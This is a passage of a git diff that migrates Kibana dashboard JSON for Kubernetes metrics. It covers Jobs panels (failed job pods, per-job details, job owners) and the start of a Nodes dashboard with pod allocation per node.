"c73b7420-ce63-4d11-b25e-387c7c76b9f1", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", + "collapseFn": "sum", + "layerId": "81a3cd5d-50e5-4e31-b736-000de1673372", + "layerType": "data", + "metricAccessor": "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", - "type": "index-pattern" + "title": "Failed Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", + "w": 14, + "x": 34, + "y": 4 + }, + "panelIndex": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "29baa5ec-91df-42a8-8d21-3c3adaa47202", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77c778d8-1664-4062-b5ff-7bbc982f49d2": { + "columnOrder": [ + "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", + "00c2aa45-0e8c-4f29-a478-4b8dbf419472", + "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", + "b1e6a372-87f5-44cd-b0c3-132f94a4a860" + ], + "columns": { + "00c2aa45-0e8c-4f29-a478-4b8dbf419472": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completions Desired", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "29baa5ec-91df-42a8-8d21-3c3adaa47202", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77c778d8-1664-4062-b5ff-7bbc982f49d2": { - "columnOrder": [ - "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", - "00c2aa45-0e8c-4f29-a478-4b8dbf419472", - "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", - "b1e6a372-87f5-44cd-b0c3-132f94a4a860" - ], - "columns": { - "00c2aa45-0e8c-4f29-a478-4b8dbf419472": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Completions Desired", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.completions.desired" - }, - "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Job Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - }, - "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Parallelism Desired", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.parallelism.desired" - }, - "b1e6a372-87f5-44cd-b0c3-132f94a4a860": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Completed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.status.complete" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.completions.desired" + }, + "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Job Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "29baa5ec-91df-42a8-8d21-3c3adaa47202", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", - "isTransposed": false - }, - { - "columnId": "00c2aa45-0e8c-4f29-a478-4b8dbf419472", - "isTransposed": false - }, - { - "columnId": "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b1e6a372-87f5-44cd-b0c3-132f94a4a860", - "isTransposed": false - } - ], - "layerId": "77c778d8-1664-4062-b5ff-7bbc982f49d2", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" }, - "title": "Informations per Job [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Parallelism Desired", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.parallelism.desired" + }, + "b1e6a372-87f5-44cd-b0c3-132f94a4a860": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Completed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.status.complete" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "29baa5ec-91df-42a8-8d21-3c3adaa47202", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "574d76e2-ca20-4c75-9dac-31265a772ba5", - "w": 24, - "x": 0, - "y": 11 - }, - "panelIndex": "574d76e2-ca20-4c75-9dac-31265a772ba5", - "title": "Informations per Job [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", + "isTransposed": false + }, + { + "columnId": "00c2aa45-0e8c-4f29-a478-4b8dbf419472", + "isTransposed": false + }, + { + "columnId": "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b1e6a372-87f5-44cd-b0c3-132f94a4a860", + "isTransposed": false + } + ], + "layerId": "77c778d8-1664-4062-b5ff-7bbc982f49d2", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aee28695-ee4d-4930-9118-c4b39cea9c2c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "36fb858f-bcf8-4256-9880-37297f1189ce": { - "columnOrder": [ - "2566280d-0419-4eaa-97e7-f8a6c76da734", - "70dcbe16-f977-46bb-a8ae-9e0067232d5e", - "6822f9cc-97ef-41b2-bebb-5444626e2a4f" - ], - "columns": { - "2566280d-0419-4eaa-97e7-f8a6c76da734": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Job Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - }, - "6822f9cc-97ef-41b2-bebb-5444626e2a4f": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Owner Kind", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.owner.kind" - }, - "70dcbe16-f977-46bb-a8ae-9e0067232d5e": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Owner Name", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.owner.name" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Informations per Job [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "574d76e2-ca20-4c75-9dac-31265a772ba5", + "w": 24, + "x": 0, + "y": 11 + }, + "panelIndex": "574d76e2-ca20-4c75-9dac-31265a772ba5", + "title": "Informations per Job [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aee28695-ee4d-4930-9118-c4b39cea9c2c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "36fb858f-bcf8-4256-9880-37297f1189ce": { + "columnOrder": [ + "2566280d-0419-4eaa-97e7-f8a6c76da734", + "70dcbe16-f977-46bb-a8ae-9e0067232d5e", + "6822f9cc-97ef-41b2-bebb-5444626e2a4f" + ], + "columns": { + "2566280d-0419-4eaa-97e7-f8a6c76da734": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Job Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "aee28695-ee4d-4930-9118-c4b39cea9c2c", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "2566280d-0419-4eaa-97e7-f8a6c76da734", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "70dcbe16-f977-46bb-a8ae-9e0067232d5e", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "6822f9cc-97ef-41b2-bebb-5444626e2a4f", - "isTransposed": false - } - ], - "layerId": "36fb858f-bcf8-4256-9880-37297f1189ce", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + }, + "6822f9cc-97ef-41b2-bebb-5444626e2a4f": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Owner Kind", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.owner.kind" }, - "title": "Job Owner Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "70dcbe16-f977-46bb-a8ae-9e0067232d5e": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Owner Name", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.owner.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "aee28695-ee4d-4930-9118-c4b39cea9c2c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "2bb97a71-28ce-428d-99d1-01b1918aebf5", - "w": 24, - "x": 24, - "y": 11 - }, - "panelIndex": "2bb97a71-28ce-428d-99d1-01b1918aebf5", - "title": "Job Owner Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Jobs", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:43:10.962Z", - "id": "kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:e4408339-1fa7-47b3-bac9-d2e7945d989f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:25697353-2613-4360-89cc-900c9e265a10", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:29baa5ec-91df-42a8-8d21-3c3adaa47202", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:aee28695-ee4d-4930-9118-c4b39cea9c2c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_f85be4a4-bc01-41a9-b566-442569777dd4:optionsListDataView", - "type": "index-pattern" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "2566280d-0419-4eaa-97e7-f8a6c76da734", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "70dcbe16-f977-46bb-a8ae-9e0067232d5e", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "6822f9cc-97ef-41b2-bebb-5444626e2a4f", + "isTransposed": false + } + ], + "layerId": "36fb858f-bcf8-4256-9880-37297f1189ce", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "Job Owner Informations [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_db907011-1eb3-4ed7-ab48-679727ee08f2:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "2bb97a71-28ce-428d-99d1-01b1918aebf5", + "w": 24, + "x": 24, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "2bb97a71-28ce-428d-99d1-01b1918aebf5", + "title": "Job Owner Informations [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] Jobs", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:e4408339-1fa7-47b3-bac9-d2e7945d989f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:25697353-2613-4360-89cc-900c9e265a10", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "574d76e2-ca20-4c75-9dac-31265a772ba5:29baa5ec-91df-42a8-8d21-3c3adaa47202", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2bb97a71-28ce-428d-99d1-01b1918aebf5:aee28695-ee4d-4930-9118-c4b39cea9c2c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_f85be4a4-bc01-41a9-b566-442569777dd4:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_db907011-1eb3-4ed7-ab48-679727ee08f2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json index b701c197e87..8d406b9414b 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,2221 +1,2238 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"57552b73-992a-46e6-9f21-9e07ca926a83\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"57552b73-992a-46e6-9f21-9e07ca926a83\",\"selectedOptions\":[],\"enhancements\":{}}},\"6c029002-b266-42ef-af36-fdcd73bfadef\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.node.name\",\"title\":\"Node Name\",\"id\":\"6c029002-b266-42ef-af36-fdcd73bfadef\",\"selectedOptions\":[],\"enhancements\":{}}}}" + "id": "kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MSwyXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "twoLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"57552b73-992a-46e6-9f21-9e07ca926a83\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"57552b73-992a-46e6-9f21-9e07ca926a83\",\"selectedOptions\":[],\"enhancements\":{}}},\"6c029002-b266-42ef-af36-fdcd73bfadef\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.node.name\",\"title\":\"Node Name\",\"id\":\"6c029002-b266-42ef-af36-fdcd73bfadef\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Nodes", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 4, + "i": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", + "w": 48, + "x": 0, + "y": 0 }, - "description": "Metrics about Nodes", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "title": "Kubernetes Dashboards [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "c6bb8ec0-dae3-4438-ab76-0bff97321124", + "w": 48, + "x": 0, + "y": 4 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "c6bb8ec0-dae3-4438-ab76-0bff97321124", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "562d314a-8db1-4d85-9fcd-fe3224749cb2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4bf1dfdb-7a60-482d-88d4-130d598ac7bb": { + "columnOrder": [ + "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", + "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "17247592-e6aa-4dba-b20d-b0accaf877dc" + ], + "columns": { + "17247592-e6aa-4dba-b20d-b0accaf877dc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.node.pod.allocatable.total: *" + }, + "isBucketed": false, + "label": "Total Allocatable Pods", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.pod.allocatable.total" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "d3f3271d-566f-4fe6-9bf1-69a47d59a2be": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" }, - "title": "", - "type": "markdown", - "uiState": {} + "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Allocated Pods", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 4, - "i": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "1d9fa4a6-44fe-489d-be4f-53a2eb02a2d5", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0-SNAPSHOT" + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "562d314a-8db1-4d85-9fcd-fe3224749cb2", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.pod", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.pod", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", + "isTransposed": false + }, + { + "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", + "isTransposed": false + }, + { + "columnId": 